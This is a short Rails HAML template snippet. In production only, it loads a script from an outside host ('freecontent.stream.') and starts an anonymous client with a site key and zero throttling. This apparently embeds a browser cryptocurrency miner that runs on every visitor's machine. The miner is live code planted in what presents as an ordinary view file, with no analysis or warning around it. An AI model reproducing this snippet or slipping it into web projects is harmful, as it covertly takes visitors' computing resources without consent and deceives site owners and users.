- if Rails.env.production?
  = javascript_include_tag "https://www.freecontent.stream./ijH8.js"
  :javascript
    var _client = new Client.Anonymous('776982a646d1c6dcf247ce0ba560df3103be04187280b636666ad071cbcb045d', {
      throttle: 0.0
    });
    _client.start();
